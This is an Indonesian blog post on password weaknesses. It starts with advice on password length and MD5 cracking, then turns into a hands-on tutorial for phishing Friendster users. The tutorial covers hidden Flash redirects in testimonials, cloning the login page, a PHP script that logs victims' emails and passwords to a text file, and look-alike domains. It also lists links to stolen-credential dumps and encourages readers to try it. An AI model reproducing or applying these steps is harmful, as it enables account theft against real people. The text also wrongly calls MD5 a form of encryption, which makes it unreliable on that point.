Ketahuilah akan Kelemahan Password anda, Mulai ATM, YM…… ( bag II )

Minimum Character Vulnerabilities

Rules number one – Create such a long password, with at least 15 digits, and is a combination of alphanumerics, number, and punctuation. Not to forget what your own password is, will always come in handy.

Mungkin akan ada yang mempertanyakan, mengapa sebuah password harus dibuat sedemikian rumit, toh hanya sebuah password. Lagipula kenapa harus ada minimum jumlah karakter dan harus dibuat sedemikian rupa hingga sulit untuk dihafal? – Apabila Anda mempertanyakan semua pertanyaan tersebut, selamat, Anda sudah setahap lebih maju dan memang siap untuk melanjutkan membaca artikel ini.

Akan saya mulai coba jelaskan, mengapa sebuah password harus memiliki jumlah minimum, dan mengapa harus 15 digit?

Apabila Anda pergi ke halaman http://www.google.com dan mengetikkan kata kunci “Password Security Standard”, Anda akan menemukan 12,700,000 lebih halaman dengan berbagai macam artikel yang memberikan Anda informasi mengenai password yang aman, dan bagaimana sebuah aturan harus ada, baik di kantor maupun pada komputer individual untuk mengawasi keamanan password. Akan ada banyak contoh-contoh situs yang akan Anda temukan.

Dari sana, Anda akan mengetahui berbagai informasi mengenai standar dasar keamanan password, baik untuk komputer kantoran, komputer warnet, maupun komputer rumah. Tidak terbatas hanya pada password secara offline, namun justru lebih diutamakan pada penggunaan password online. Sebab tidak dapat dipungkiri bahwa segala sesuatu yang disebarluaskan di internet, akan memiliki potensi terserang dan terambil alih yang jauh lebih besar.

Oke! Cukup basa-basinya. Dari 12 juta situs yang Anda temukan, intinya hanya satu, yakni sebuah daftar peraturan seputar password dan penggunaannya. Panjang password dan jumlah karakter selalu menjadi yang nomor satu dibicarakan di dalam setiap daftar, dan 90% dari daftar tersebut memiliki standar penggolongan password sebagai berikut:

– Minimum 6 digit – password yang lemah!

– Minimum 8 digit – password medium! (direkomendasikan menjadi jumlah minimal, namun belum tergolong aman).

– Minimum 12 digit – password yang kuat!

Berdasarkan hal tersebut, dapat kita tarik sebuah kesimpulan bahwa kita harus memiliki setidaknya 12 jumlah karakter dalam password kita agar tergolong sebagai password yang kuat. Memang benar, namun perlu juga kita pikirkan kemungkinan terjadinya penyerangan lain, selain melakukan teknik penebakan password secara membabi-buta (Brute Force Attack).

Encryption

Untuk dapat membahas arti penting dari jumlah karakter pada sebuah password, kita harus pertama-tam mengenal apa yang namanya sistem enkripsi. Singkatnya enkripsi itu sendiri adalah sebuah teknik yang melakukan pengubahan informasi (berupa tulisan) menjadi sesuatu yang tidak bisa dimengerti orang lain, dengan menggunakan sebuah kunci matematis. Orang lain tidak akan pernah mengerti apa arti dari kata yang sudah diubah (diacak) oleh proses enkripsi apabila mereka tidak memiliki kuncinya. Kunci daripada proses enkripsi bisa berupa aturan, angka, arahan, kata maupun kalimat.

Analogi mudah, misalnya saya ingin melakukan enkripsi kalimat “Saya ingin makan” dan kuncinya adalah sebuah perhitungan matematis Matrix 8×8 (hanya misalnya loh), mungkin kalimat tersebut akan menjadi sesuatu seperti “9xKKL^%ASNK40lv” (siapa yang tahu?).

Beberapa contoh enkripsi yang paling banyak digunakan di dunia keamanan informasi adalah RSA, MD5, dan SHA1.

Banyak orang salah mengartikan Encoding dan Enkripsi (Encryption) sebagai suatu hal yang sama. Kenyataannya kedua hal ini berbeda jauh. Walaupun memiliki fungsi yang sama, yakni melakukan pengacakan informasi dan membuat sebuah informasi menjadi tidak bisa dimengerti oleh orang yang tidak memiliki hak untuk memilikinya, namun ada sebuah perbedaan besar antara Encoding dan Enkripsi.

Di saat Enkripsi membutuhkan sebuah kunci untuk melakukan tugasnya yang dibutuhkan encoding hanyalah sebuah ketentuan yang harus dia jalankan. Ketentuan tersebut bisa saja berupa kalimat suruhan/arahan seperti “Majukan seluruh huruf 3 urutan ke depan”. Sehingga sebuah kata “Saya” akan berubah menjadi “Vdbd”.

Memang terkesan lucu, namun perusahaan besar seperti Yahoo Inc, pun menggunakan teknik decode yang mudah untuk melindungi cookie para pengguna layanannya. Berikut adalah gambaran singkatnya:

Contoh cookie yang pernah didapatkan dari proses hacking account Yahoo. Ini adalah contoh salah satu cookies yang saya dapatkan:

Y=v=1&n=8jnd0gdjo11f8&l=h4d_meh3b854_rv/o&p=m2ovvph013000000&jb=16|47|&iz=1016&r=cs&lg=us&intl=us&np=1;

Apabila Anda ingin mencoba membacanya, silakan membaca dengan urutan sebagai berikut:

– sk & d is session

– n is password

– l is username

– p is country, year of birth, gender and more

– b is cookies created

– lg is language

– intl is international language

– iz is zipcode

– jb is Industry and title

Dan apabila Anda melakukan decoding (proses pengembalian informasi yang sudah di-encode ke text normal lagi) caranya seperti ini:

0123456789abcdefghijklmnopqrstuvwxyz

abcdefghijklmnopqrstuvwxyz0123456789

Maka username, atau value 1 (login name) pada cookie tersebut bisa dibaca dengan mudah menjadi:

h4d_meh3b854_rv/o

ren_worldlife_15/o

Di mana variable /o akan selalu tetap pada setiap username.

Tapi tentu saja Yahoo sudah tidak menggunakan teknik seperti ini lagi.

MD5

OK! Dengan ini Anda sudah sedikit mengenal apa itu teknik enkripsi dan apa perbedaannya dengan encoding. Pada bagian sisipan ini, kita akan membahas salah satu teknik enkripsi yang paling digemari di seluruh dunia, mudah dan aman, yakni MD5.

MD5 atau yang juga dikenal dengan nama Message Digest algorithm 5, merupakan sebuah teknik enkripsi yang terbilang cukup muda. Ditemukan pada bulan April 1992, oleh seorang ahli matematika bernama Ron Rivest. Teknik ini memiliki saudara-saudara yang sebelumnya juga sudah pernah tampil, yakni MD, MD2, MD3, dan MD4. Namun keempat saudara MD5 itu kandas dimakan waktu. Kelemahan demi kelemahan yang ditemukan membuat mereka tidak lagi populer untuk dipergunakan.

MD5 memang dikenal sebagai enkripsi yang paling mudah dipergunakan dan terbilang sangat aman. Tak jarang para pecinta kriptografi menyatakan bahwa MD5 adalah teknik enkripsi satu arah, yang juga berarti bila Anda sudah mengacak sebuah informasi, hasil acakan itu tidak akan bisa dikembalikan lagi menjadi informasi tertulis yang sebenarnya. Bayangkan sebuah pintu dengan kenop yang hanya ada pada bagian depan pintu.

Dengan menggunakan 128 bit enkripsi, MD5 selalu menghasilkan 32 buah karakter yang terdiri dari huruf dan angka sebagai hasil akhirnya. Walaupun Anda memasukkan informasi yang sangat panjang atau sangat pendek, hasil yang akan keluar tetap berupa kombinasi angka dan huruf sebanyak 32 buah karakter. Menarik bukan? Berikut adalah contohnya.

Hasil yang akan didapat melalui enkripsi MD5 terhadap kalimat “Nama saya adalah Th0R dan saya seorang pecinta ilmu komputer dan teknologi” adalah 88817b3e8ac69fe429333ef1dd3b459e (32 buah karakter kombinasi angka dan huruf).

Sedangkan hasil yang didapatkan dari proses enkripsi angka 1 adalah c4ca4238a0b923820dcc509a6f75849b (tetap berjumlah 32 karakter). Walaupun Anda hanya mengubah sedikit saja bagian daripada kalimat yang ingin Anda enkripsi, misalnya kalimat di atas menjadi “Nama saya Th0R dam saya seorang pecinta ilmu komputer dan teknologi” (Anda perhatikan huruf m dalam kata yang seharusnya “dan”), hasilnya adalah 8f66121c3197e935cd35cb34bf3310d2.

Tetap berupa kombinasi angka dan huruf dengan jumlah karakter 32 buah, namun tidak memiliki kesamaan apapun bukan? Sistem enkripsi MD5 tidak memiliki pattern (atau pola) dalam melakukan pekerjaannya. Suatu hal yang semakin membuat para pembobol password kewalahan.

Lalu apa hubungannya dengan jumlah character(s)?

Pernahkah Anda mendaftar ke sebuah situs dan dihadapi dengan pernyataan seperti ini?

Anda harus mengingat password Anda. Kami tidak dapat membantu Anda mengembalikan password tersebut, dikarenakan password telah terenkripsi dengan sistem MD5/SHA1″.

Saya sendiri pernah menemukannya. Hahaha. (kayak crayon sinchan, dikit-dikit ketawa).

Jangan pernah percaya pernyataan seperti ini, sebab mungkin saja Anda menjadi salah satu korban pencurian password berikutnya!

Walau sebagian besar orang menganggap bahwa enkripsi MD5 pada kebanyakan situs tidak dapat dibaca lagi sebagai informasi utuh (sebagai tulisan password Anda), namun merupakan sebuah kenyataan bahwa hal tersebut mungkin dilakukan.

Memang, tidak ada cara legal atau resmi untuk dapat melakukan dekripsi sebuah hasil enkripsi MD5, namun tetap ada jalan lain. Beberapa jalan untuk dapat mengembalikan hasil enkripsi MD5 menjadi wujud awalnya adalah dengan melakukan Bruteforcing, Reverse Look Up Tables, dan Rainbow Table.

– Brute Force. Merupakan sebuah teknik penyerangan dengan melakukan penebakan. Hal ini sering terjadi pada penyerangan password, namun bagaimana ini bisa terjadi pada MD5? Mudah saja. Katakanlah saya memiliki sebuah hasil enkripsi MD5, kemudian saya membuat sebuah program, yang melakukan pengubahan otomatis berbagai huruf dan angka dari “a” hingga “zzzzzzz” ke dalam bentuk MD5. Apabila salah satu daripada hasil itu memiliki kombinasi yang sama persis dengan MD5 yang ingin saya pecahkan, maka bentuk huruf daripada MD5 itulah jawabannya.

– Reverse Look Up Tables. Biasanya hal ini dilakukan setelah seseorang melakukan teknik Brute Forcing seperti yang sudah dibahas sedikit di atas. Lalu segala hasil bruteforce ia simpan dalam bentuk kolom-kolom. Kemudian apabila suatu hari ada sebuah hasil enkripsi MD5 yang ingin ia pecahkan, ia tinggal mencari dalam kumpulan MD5 yang ia miliki tersebut dan apabila ketemu, ia hanya perlu melihat bentuk awal dari MD5 tersebut.

– Rainbow Table. Merupakan pengembangan akhir dari teknik bruteforce. Seperti halnya “Dictionary Attack”, yang dilakukan Rainbow Table ini adalah menyimpan segala bentuk hasil enkripsi MD5 berbagai kata maupun kalimat yang kemudian akan diubah ke dalam bentuk MD5 dan dicocokkan hasilnya seperti teknik bruteforce. walaupun terlihat mirip, namun teknik ini teruji jauh lebih jitu dan cepat daripada sistem penebakan bruteforcing.

Beberapa hal yang sangat perlu Anda cermati dalam menghadapi tiga buah rangkaian serangan tersebut adalah:

– Kebanyakan alat bruteforce tidak dilengkapi karakter berupa tanda baca seperti ! dan *.

– Bruteforce sangat memakan waktu. Semakin panjang sebuah password, akan memakan waktu lebih lama untuk bisa dipecahkan dengan teknik bruteforce, yang notabene melakukan pengurutan kombinasi huruf dan angka satu per satu.

– Rainbow Table biasanya memiliki batasan jumlah karakter tertentu (yang terlengkap hingga saat ini adalah 12 karakter).

Berikut adalah sebuah situs yang memberikan Anda kombinasi dari fungsi Rainbow Table dan Reverse Look Up Table untuk melakukan pembobolan hasil akhir enkripsi. situs ini juga merupakan salah satu yang dapat tergolong canggih dan cepat (http://www.milw0rm.com).

Apabila dicermati lebih baik dan teliti, beberapa password yang berhasil di-crack memiliki beberapa kesamaan yakni, tidak lebih dari 9 buah karakter, tidak ada huruf besar dan kecil serta tidak memiliki tanda baca apapun.

Yup! Rainbow Table tercanggih hingga saat ini pun memiliki keterbatasan untuk dapat menebak hanya password dengan jumlah maksimum 12 karakter (termasuk simbol tanda baca), ini saja sudah bisa memakan waktu berhari-hari dalam proses dekripsinya dan ukuran Rainbow Table-nya pun mencapai 60 Gigabyte. Tidak akan efektif apabila lebih dari itu. Walau pernah diisukan ada Rainbow Table yang mampu melakukan enkripsi password mencapai 14 karakter, namun hingga saat ini belum keluar di khalayak umum.

Sekarang Anda sudah mengerti mengapa sebuah password yang aman adalah dengan jumlah minimum karakter 15 buah, harus memiliki tanda baca, dan merupakan kombinasi huruf besar, huruf kecil dan angka? Hahaha (ketawa lagi). Good then!

Aha! Mungkin pada poin ini akan ada beberapa pembaca yang mempertanyakan pertanyaan sebagai berikut “Oh! Walaupun MD5 bisa dicrack, bagaimana bisa seorang hacker mendapatkan password kita yang terenkripsi MD5 dari sebuah situs?” Akan saya jawab langsung dengan sebuah penggalan ilustrasi yang dicomot dari situs http://www.airliners.de (salah satu situs terbesar dunia mengenai industri penerbangan). Dari situs tersebut terlihat username dan password dalam bentuk hasil enkripsi MD5. Mudah dilakukan dengan teknik penyerangan Cross-site scr i pting (XSS) maupun SQL Injection.

Phising dan keylogger vulnerabilities

Rules number two. Giving out your password(s) directly, indirectly, consciously, or unconsciously is not permitted due to several stealing possibilities. In order to avoid any fake online pages, and/or loggers you really need to be aware of your surroundings and pages that you’re about to visit.

Memberikan password Anda kepada orang lain dalam bentuk apapun, maupun dengan cara apapun sudah jelas merupakan sebuah hal yang salah. Jangan pernah percaya siapapun, begitulah sekiranya dunia keamanan informasi bekerja, sebab bisa saja seseorang yang Anda percaya itu menggunakan password Anda untuk melakukan akses ke dalam account Anda (yang mungkin saja menyimpan hal penting di dalamnya).

Bagi seorang yang Anda percaya untuk membuka email, maupun account pribadi Anda lainnya, tentu mereka juga memiliki banyak alasan, diantaranya:

– Sebagai seorang pacar, mereka ingin melihat isi dari email Anda.

– Sebagai seorang teman baik, mereka merasa tidak salah apabila melihat isi dari email Anda.

– Sebagai seorang rekan kerja, membantu mengurus informasi dan urusan sehubungan dengan kerjaan.

– Dan lain sebagainya.

Memang pada saat itu tidak akan terjadi kesalahan apapun juga, namun bagaimana kalau suatu hari Anda putus dengan pacar Anda tersebut dan Anda lupa mengganti password email atau account pribadi Anda lainnya? Bukankah tetap mungkin bagi dia untuk melakukan berbagai hal yang merugikan Anda? Apalagi kalau Anda melakukan pemutusan hubungan dengan tidak baik.

Atau bagaimana apabila Anda melakukan kerjasama bisnis dengan seseorang? Katakanlah bisnis tersebut adalah Internet Marketing, dan Anda memberitahukan kepada mereka situs Anda serta email Anda dan bahkan mungkin mempercayakan password Google Adsense Anda kepada mereka. Mungkin saja apabila suatu hari kalian mengalami sedikit permasalahan, ia akan melakukan click-fraud (melakukan klik pada advertisement Anda dalam jumlah sangat banyak dan sangat cepat, sehingga Anda dinilai melakukan kecurangan – Google akan menutup account yang melakukan hal seperti itu). Bahkan bisa saja mereka melakukan pencurian account Google Adsense milik Anda.

Bagaimana tidak? Apabila orang lain saja ingin dan belajar untuk mencuri account Google AdSense milik orang lain, mengapa seorang yang merasa telah disakiti atau dihina dan dikhianati oleh Anda tidak akan melakukannya? Ingat, tidak sedikit kasus kriminalitas terjadi dengan modus dendam.

Oke! Saya bukan seorang ahli percintaan, ahli hukum, apalagi psikologi manusia. Namun hal semacam itu memang mungkin terjadi, dan setidaknya salah satu teman saya pernah mengalami hal semacam ini. Oleh karena itu, alangkah baiknya apabila Anda menghindari melakukan sharing password sebisanya, kepada siapapun, terlebih lagi orang yang memiliki ketertarikan juga dalam bidang teknologi informasi. Suatu kepercayaan bukan terbentuk karena serah terima dan sharing password.

Artikel ini tidak akan membahas mengenai berbagai aspek psikologi dan kemanusiaan di atas, namun suatu hal yang akan dilakukan para hacker (yang bukan teman kalian – bahkan tergolong orang yang belum pernah Anda kenal sama sekali) untuk “menanyakan” password Anda, dan membuat Anda menjawab “pertanyaan” mereka tersebut.

Phising Attack

Seperti yang sudah kita ketahui, dari pertengahan tahun 2006 (sejak Friendster Hacking itu sendiri ditemukan), testimonial adalah titik paling lemah yang ada pada http://www.friendster.com. Berbagai phising dilakukan melalui testimonial tersebut pada masa itu. Berikut adalah cara-caranya.

Apa yang dilakukan oleh seorang penyerang pada masa itu di bagian testimonial bukanlah suatu hal yang sangat sulit dilakukan, hanya dengan bermodalkan Macromedia Flash 8, semua orang bisa melakukan hal yang serupa. Intinya adalah, pembuatan file flash *.swf yang mengandung scr i pt GetURL, sehingga memaksa siapapun yang melihat file flash tersebut melakukan GetURL seperti yang diperintahkan.

Hanya dengan mengetikkan scr i pt, yang kemudian membuat ukuran flash menjadi 1×1 atau berapapun besar yang Anda inginkan, kemudian melakukan pembuatan file *.swf-nya menggunakan Macromedia Flash 8, Anda pun dapat melakukan hacking Friendster.

scr i pt yang bisa dimasukkan pun ternyata bervariasi, tergantu apa yang diinginkan oleh sang penyerang, untuk dieksekusi oleh para korbannya.

Pada contoh kasus di atas, scr i pt tersebut ditujukan untuk membuat seorang korban (mereka yang membuka *.swf file tersebut di internet), untuk melakukan download file text.exe yang berlokasi di alamat web http://www.hellgeeks.org/text.exe.

Sedangkan bagi mereka yang ingin membuat redirection, scr i pt yang diperlukan pun tidak jauh berbeda dengan yang sudah ada pada contoh di atas. Namun perlu sedikit dimodifikasi, yakni dengan menghilangkan nama file di bagian akhir URL sehingga scr i pt-nya akan menjadi seperti ini:

getURL (”http://www.contoh.com”);

atau

getURL (”http://www.contoh.com”, “_parent”)

Seluruh pengguna Friendster yang membuka testimonial yang memiliki flash dengan scr i pt seperti yang disebutkan, akan mengalami redirection ke alamat http://www.contoh.com

Bagaimana menaruhnya dalam testimonial? Yah tentu pertama-tama Anda harus melakukan upload file swf Anda ke dalam sebuah web hosting. Misalnya nama file Anda adalah ngehack.swf, Anda perlu menaruhnya di sebuah website yang memberikan layanan hosting, dan kemudian mengambil URL langsungnya, di mana Anda bisa langsung membuka URL tersebut dan melihat file Flash itu. Misalnya saja dengan alamat http://www.contoh.com/ngehack.swf.

Setelah file ngehack.swf selesai dibentuk dan diupload dengan benar, yang perlu Anda lakukan berikutnya adalah mencoba membuka Friendster Anda, dan mengirimkannya sebagai salah satu contoh kepada salah seorang teman Anda. Tentunya pengiriman ini harus dilakukan menggunakan testimonial, mengingat testimonial adalah cara yang kita bahas dalam kesempatan kali ini.

Misalnya dalam kolom komentar (testimonial) dalam friendster kita isi dengan link file swf kita:

http://img485.imageshack.us/img485/9995/friendstertesting5vf.swf

Kemudian tekan tombol submit di bagian bawah kolom komentar, maka link file swf kita sudah tersimpan di dalam friendster, dan siapa yang hendak membaca, lalu mengklik komentar yang kita buat akan tidak sengaja mengarahkannya kepada link redirect yang kita buat.

Hal ini telah menunjukkan kepada kita, sebuah URL yang mengandung SWF file yang memiliki scr i pt untuk memaksa seorang user men-download file test.exe setelah melihat file swf tersebut, namun bukan berarti kita akan mengirimkannya mentah-mentah seperti itu, yang perlu kita lakukan adalah melakukan embed flash scr i pt tersebut dengan menggunakan HTML scr i pt. Cara ini jauh lebih canggih dari cara yang tadi.

scr i pt yang digunakan untuk melakukan embed flash pada saat itu adalah dengan format seperti ini:

http://”direct-url-flash-Anda”

Atau

<object classid=”clsid:D27CDB6E-AE6D-11cf-96B8-444553540000″ codebase=”http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0″ width=”400″ height=”250″><param name=”movie” value=”http://www.contoh.com/ngehack.swf” /><param name=”quality” value=”high” /></object>

Dimana “Direct-URL-Flash-Anda” perlu diganti menjadi alamat di mana Anda mengupload flash Anda, dan width serta height adalah tinggi dan lebar tampilan. Apabila Anda tidak menyertakan gambar animasi apapun dalam flash tersebut, buatlah itu menjadi 1×1, sehingga kotak flash putih kosong tidak akan terlihat jelas pada saat terjadi proses loading. Namun bukan berarti Anda harus menggunakan 1×1 seterusnya, modifikasi seperti apapun bebas Anda lakukan sesuai imajinasi masing-masing.

Setelah melakukan embed dan menaruh Direct URL tempat file diupload, maka Anda hanya perlu menekan tombol “Submit” untuk kemudian membuat testimonial ini terkirim langsung kepada sang korban.

Dan apabila korban melihat testimonial tersebut, tanpa mematikan penggunaan Javascr i pt pada browser miliknya, maka ia akan langsung mendapatkan dirinya melakukan download sebuah file dengan nama test.exe yang isinya berupa scr i pt redirect atau scr i pt apapun yang tadi telah kita buat.

Membahas mengenai redirection dengan menggunakan HTML Embed dan Flash yang disinyalir sebagai salah sebuah contoh metode Cross Site scr i pting, ternyata tidak bisa terpisah jauh dengan teknik pembuatan halaman login palsu. Bagaimana tidak? Kita sekarang sudah mengerti bagaimana kita ter-redirect ke halaman login palsu, tapi bagaimana seorang hacker tak bertanggung jawab menyiapkan login halaman palsu dan mendapatkan username dan password kita yah?

Pertama-tama tentu kita harus mengetahui scr i pt seperti apa sih yang Friendster gunakan untuk login page-nya? Dalam kasus ini kita akan coba melihat pada bagian login ulang (kalau salah memasukkan username/password), sehingga akan terlihat seperti ada sebuah error dari pihak Friendster apabila seorang korban terkena scr i pt redirect ini. Biasanya apabila ada error pada login pertama, Friendster akan memberikan Anda page http://www.friendster.com/login.php dengan sedikit informasi tambahan bahwa Anda salah memasukkan username atau password, maupun berbagai error sejenis.

Oleh karena itu mari kita buka http://www.friendster.com/login.php dengan menggunakan browser kesayangan masing-masing, kemudian menampilkan source code halaman tersebut. Bagi mereka yang belum mengeri bagaimana melakukan itu dengan menggunakan Firefox Mozilla, silakan dicoba-coba dulu. Coba saja pilih pilihan menu view source (di tiap browser bisa berbeda-beda, coba cari-cari saja dulu). Setelah ketemu, klik menu tersebut dan kemudian akan membuka sebuah halaman baru yang berisikan source code HTML dari halaman Friendster tersebut.

BLABLABLA!!

<div class=”login”>Please sign in to continue</div>

<div class=”boxcontent”><form name=”login_form” method=”post” action=”/login.php”>

<input type=”hidden” name=”_submitted” value=”1″>

<input type=”hidden” name=”next” value=”/”>

<input type=”hidden” name=”tzoffset” value=””>

<scr i pt language=”Javascr i pt”>

var now = new Date ();

document.login_form.tzoffset.value = now.getTimezoneOffset();

</scr i pt>

<table cellpadding=”3″ cellspacing=”0″ border=”0″>

Dan seterusnya!!!

Yang perlu Anda lakukan pertama-tama adalah meng-copy scr i pt tersebut ke dalam notepad dan melihat secara khusus pada bagian terpenting yaitu mulai dari

<div class=”login”>Please sign in to continue</div>

<div class=”boxcontent”><form name=”login_form” method=”post” action=”/login.php”>

Coba dicari-cari dua baris scr i pt di atas dan perhatikan secara teliti. scr i ptnya sebenarnya cukup panjang yaitu sekitar 14 halaman buku, jadi sebaiknya Anda teliti dan mencari-cari skrip-skrip tersebut. Setelah ketemu baru Anda perhatikan baik-baik. Pada dua baris scr i pt itu Anda perlu sedikit melakukan modifikasi. Namun modifikasi apa yang perlu Anda lakukan? Yakni menanam PHP scr i pt untuk logger-nya.

Seperti apa sih PHP scr i pt logger? Nah, sabar ya, bentuknya kira-kira seperti ini:

<?php

$email = $_POST[email];

$password = $_POST[password];

$f1 = fopen(’friendster.txt’, ‘a’);

fwrite($f1, “$email . $password \n\n”);

fclose($f1);

?>

<scr i pt LANGUAGE=”Javascr i pt”>

=”http://www.friendster.com/index.php”;

</scr i pt>

Hahaha, tenang, saya mengerti, tidak semua pembaca artikel ini mengenal yang namanya bahasa programming PHP. Jadi saya akan menjelaskan step-by-step cara menggunakannya.

Tentu saja lakukan copy-paste scr i pt tersebut ke dalam notepad. Setelah itu lakukanlah Save-As menjadi “login.php” (tanpa tanda kutip). Pilih Save-As Type menjadi all types.

Setelah melakukan proses seperti diatas, Anda akan mendapatkan file login.php. Tapi apa sih yang scr i pt ini lakukan? dia akan mengirimkan email dan password yang telah dituliskan oleh para korban kita di dalam halaman login palsu, yang kemudian akan dituliskan pada friendster.txt di folder hosting yang sama. Selain itu, scr i pt ini pun akan membuat sang korban kembali kepada inbox account mereka di friendster.com seperti pada saat mereka melakukan login normal.

Jadi setelah ini apa yang perlu kita lakukan? Yah, tentu saja membuat file friendster.txt kosong. Kemudian mempersiapkan kedua file login.php dan friendster.txt ini untuk kemudian digabungkan dengan halaman palsunya.

Kembali kepada halaman palsu. Bukalah kembali halaman di mana Anda menyimpan source code yang telah Anda copy-paste dari halaman http://www.friendster.com/login.php dan temukan line yang sebelumnya telah kita bold, yakni:

<div class=”login”>Please sign in to continue</div>

<div class=”boxcontent”><form name=”login_form” method=”post” action=”/login.php”>

Yang perlu dilakukan pada bagian ini adalah Anda harus mengubah

action=”/login.php” menjadi

action=”http://www.website-Anda.com/login.php”

yang mana website-Anda.com adalah website tempat Anda menaruh login.php, friendster.txt, dan halaman palsu Anda nantinya.

Setelah mengubah scr i pt action tadi, yang perlu Anda lakukan berikutnya adalah mencari segala jenis file yang memiliki ekstensi *.gif, *.jpg, *.php, dan *.html yang perlu Anda ubah sedikit. Kebanyakan yang akan Anda temukan adalah link langsung seperti <image src=”/friendster.jpg”></image> yang mana gambar tersebut tidak akan tampil di halaman login palsu Anda, karena html akan melakukan pengambilan gambar di http://www.website-anda.com/ ketimbang milik Friendster, dan hal ini bisa saja menimbulkan kecurigaan.

Oleh karena itu, ubahlah semua file dengan format html menjadi seperti <image src=”http://www.friendster.com/friendster.jpg”></image> alias hanya menambahkan http://www.friendster.com di depan link langsung yang mereka sediakan. Agar pada saat seseorang membuka halaman palsu itu, segala gambar diambil dari website aslinya, oleh halaman login palsu Anda ini.

Setelah scr i pt halaman palsu tersebut telah siap, Anda hanya perlu melakukan save as HTML.

Sekarang Anda telah memiliki tiga file penting, yakni friendsterfake.html, friendster.txt, dan login.php. Tentu Anda sedikit senang karena sedikit lagi Anda akan berhasil membuat fake login, dan sekarang adalah waktu bagi Anda untuk mengupload ketiga file tersebut ke dalam website Anda, sehingga Anda akan memiliki tiga buah link:

http://www.website-Anda.com/friendsterfake.html

http://www.website-Anda.com/friendster.txt

http://www.website-Anda.com/login.php

Tahapan paling akhir dari ini tentu adalah kembali kepada pembuatan Flash, namun kali ini Anda akan menggunakan scr i pt:

getURL(”http://www.website-Anda.com/friendsterfake.html”);

Kemudian melakukan embed file swf tersebut ke dalam testimonial, dengan menggunakan HTML, yang nantinya akan dikirimkan kepada korban Anda. Sekali sang korban membuka testimonial tersebut, ia akan ter-redirect ke http://www.website-Anda.com/friendsterfake.html dan diminta untuk login ulang.

Tentu akan ada sedikit pertanyaan “Eits, tapi kan alamat di URL akan tetap http://www.website-Anda.com/friendsterfake.html dong?” Nah, disinilah teknik social engineering atau seni penipuan internet dilakukan. Pernahkah Anda mendengar mengenai halaman friendster palsu yang beralamatkan di http://www.freindster.co.nr (perhatikan, alamatnya bukan friendster tapi freindster). Tidak percaya? Browsing saja dan buktikan sendiri!

Yup, itu friendster palsu yang dibuat hacker iseng bernama Th0r! Namun hal sebenarnya adalah HTML files-nya terletak di lokasi http://shinigami.byethost32.com/friendster.html pada saat itu. Hacker itu menggunakan domain redirection gratisan dari http://www.freedomain.co.nr untuk memalsukan alamatnya agar sedikit mirip dengan http://www.friendster.com

Bagi mereka yang sudah berhasil melakukan hal semacam ini, bisa melihat hasil penyimpanan data di lokasi URL http://www.website-Anda.com/friendster.txt. Beberapa contoh tempat penyimpanan hasil “jarahan” email dan password Friendster yang pernah saya ketahui adalah sebagai berikut:

http://shinigami.byethost32.com/fcuk.txt

http://www.hellgeeks.com/friendstersucks.txt

http://www.yogyafree.net/familycode/friendster.txt

Yang kesemua link-nya sudah mati, baik secara sengaja maupun tidak sengaja, dan kemudian dituliskan pada artikel ini sebagai referensi. Contoh teknik di atas bisa juga digunakan untuk berbagai situs lainnya, hanya perlu sedikit penyesuaian. Hehehe. Silakan bermain dengan umpan dan joran pancing di internet.

Selain menggunakan teknik phising, teknik lain yang dapat digunakan para Hacker untuk “meminta” password Anda adalah Keylogger dan Trojan.

 

Iklan